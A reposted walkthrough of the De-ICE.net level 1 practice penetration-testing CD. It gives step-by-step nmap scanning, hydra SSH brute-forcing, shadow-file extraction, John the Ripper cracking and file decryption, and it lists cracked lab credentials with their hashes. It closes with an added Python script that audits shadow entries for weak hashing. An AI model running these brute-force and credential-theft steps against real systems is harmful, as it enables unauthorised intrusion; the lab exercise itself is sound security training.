HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

*** Do NOT attack any computer or network without authorization, or you may be put in jail. ***



Credit to : g0tmi1k



This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.



The original post is here



Links



Watch video on-line

Download video



What is this?



This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 1.



The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.



What do I need?



BackTrack 4 (Final)

de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)

Dictionary(s)



Software

Name: De-ICE.net

Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)

Home Page: http://www.de-ice.net or http://heorot.net/livecds/



Download Link:

http://www.mediafire.com/?bfo9b21g2m69tb6

http://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso



Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks



Commands



nmap -n 192.168.1.1-255



nmap -n -sS -sV -O 192.168.1.100



firefox 192.168.1.100



[+]kate -> make list of possible usernames. Save. Filename: usernames

// lastF, fLast



hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s



ssh bbanter@192.168.1.100

// Answer "yes" if asked about trusting the host's authenticity. Password: bbanter



cd /etc/



cat passwd



[+]kate -> Update usernames. Save.



cat group



exit



cd /root/tools/dictionary/



cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords



hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords



ssh aadams@192.168.1.100

// Password: nostradamus



cd /etc/



sudo cat shadow

// Password: nostradamus



[+]kate -> New -> Paste -> Save. Filename: shadow



exit



john



./john --rules --wordlist=/root/passwords --users=root /root/shadow

// Password: tarot



ssh aadams@192.168.1.100

// Password: nostradamus



su

// Password: tarot



ls -a



cd ..



ls -a



cd ftp/



ls -a



cd incoming/



ls -a



openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot



cd /etc/



vi vsftpd.conf

// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)



modprobe capability



exit



exit



ftp 192.168.1.100

// User: root. Password: tarot



ls -a



cd ..



ls -a



cd home



ls -a



cd ftp



ls -a



cd incoming



ls -a



get salary.csv



cd /pentest/passwords/jtr



ls



mv salary.csv ~



[+]kate -> salary.csv



// GAME OVER



----------------------------------------------------------------------------------------------------

Users

root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::

aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::

bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::

ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

----------------------------------------------------------------------------------------------------
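
The shadow entries listed above all use the `$1$` (md5crypt) scheme, and most have no effective password expiry (root's maximum-age field is empty, the others are 99999). As an added example (not part of g0tmi1k's original post), this Python script audits shadow(5)-format lines for those two weaknesses; the sample lines and the names `audit_shadow` and `scheme_id` are constructed for illustration.

```python
# Added example: audit shadow(5)-format lines for weak hash schemes and
# missing password ageing. The sample lines are constructed, not real hashes.
WEAK_SCHEMES = {"1": "md5crypt", "": "DES/legacy crypt"}
STRONG_SCHEMES = {"5", "6", "y", "2b", "2y"}  # sha256/sha512crypt, yescrypt, bcrypt

SAMPLE_SHADOW = """\
root:$1$CONSTRUCT$0000000000000000000000:13553:0:::::
alice:$1$CONSTRUCT$1111111111111111111111:13550:0:99999:7:::
bob:$6$CONSTRUCTEDSALT$2222222222222222222222:19000:1:90:7:::
daemon:*:13550:0:99999:7:::
"""

def scheme_id(hash_field):
    """Return the crypt(3) scheme id ('1', '6', ...) or '' for legacy DES."""
    if hash_field.startswith("$"):
        parts = hash_field.split("$")
        return parts[1] if len(parts) > 2 else ""
    return ""

def audit_shadow(text):
    """Return {user: [findings]} for accounts that can log in with a password."""
    report = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 5:
            continue  # not a shadow(5) record
        user, pw_hash, max_age = fields[0], fields[1], fields[4]
        if pw_hash == "":
            report[user] = ["empty password field"]
            continue
        if pw_hash[0] in "*!":
            continue  # locked account, no password login possible
        findings = []
        sid = scheme_id(pw_hash)
        if sid in WEAK_SCHEMES:
            findings.append("weak hash scheme: " + WEAK_SCHEMES[sid])
        elif sid not in STRONG_SCHEMES:
            findings.append("unknown hash scheme: $" + sid + "$")
        # An empty maximum-age field, or the 99999-day default, means no expiry.
        if max_age in ("", "99999"):
            findings.append("no password expiry")
        if findings:
            report[user] = findings
    return report

if __name__ == "__main__":
    for user, findings in audit_shadow(SAMPLE_SHADOW).items():
        print(user + ": " + "; ".join(findings))
```
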





Notes



Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html



That's all! See you.